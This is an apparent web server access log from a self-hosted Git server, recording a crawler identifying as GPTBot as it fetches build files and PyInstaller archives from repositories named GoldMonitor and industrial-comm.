git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:18:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18893] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:18:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11634] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 70912] [Gzip 17.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11605] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 70879] [Gzip 17.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72092] [Gzip 17.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 71190] [Gzip 17.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:18:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11633] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18933] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72017] [Gzip 17.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 37040] [Gzip 14.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 70822] [Gzip 17.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 70907] [Gzip 17.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18897] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18934] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38636] [Gzip 14.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18932] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 71224] [Gzip 17.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72061] [Gzip 17.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72087] [Gzip 17.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 37069] [Gzip 14.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:18:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38632] [Gzip 14.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10977] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72043] [Gzip 17.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:18:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 71895] [Gzip 17.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 